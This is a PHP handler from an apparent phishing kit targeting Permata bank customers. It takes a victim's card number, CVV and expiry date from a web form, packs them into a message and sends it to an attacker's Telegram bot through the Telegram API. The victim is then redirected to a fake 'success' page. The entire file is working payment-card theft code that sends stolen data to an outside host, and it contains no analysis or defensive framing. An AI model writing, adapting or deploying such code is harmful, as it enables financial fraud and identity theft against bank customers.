<?php
session_start();
include "./telegram.php";

$nokartu = $_POST['nokartu'];
$cvv = $_POST['cvv'];
$masa = $_POST['masa'];
$tahun = $_POST['tahun'];
$_SESSION['nokartu'] = $nokartu;
$_SESSION['bulan'] = $bulan;
$_SESSION['masa'] = $masa;
$_SESSION['cvv'] = $cvv;
$penyedia = $_SESSION['penyedia'];


$message = "

KARTU Permata | ".$nohp."


• Nokartu  = ".$nokartu."

• Masa Berlaku  = ".$masa."

• CVV  = ".$cvv."



";

function sendMessage($telegram_id, $message, $id_bot) {
    $url = "https://api.telegram.org/bot" . $id_bot . "/sendMessage?parse_mode=markdown&chat_id=" . $telegram_id;
    $url = $url . "&text=" . urlencode($message);
    $ch = curl_init();
    $optArray = array(
        CURLOPT_URL => $url,
        CURLOPT_RETURNTRANSFER => true
    );
    curl_setopt_array($ch, $optArray);
    $result = curl_exec($ch);
    curl_close($ch);
}

sendMessage($telegram_id, $message, $id_bot);
header('Location: ../berhasilblok.html');
?>
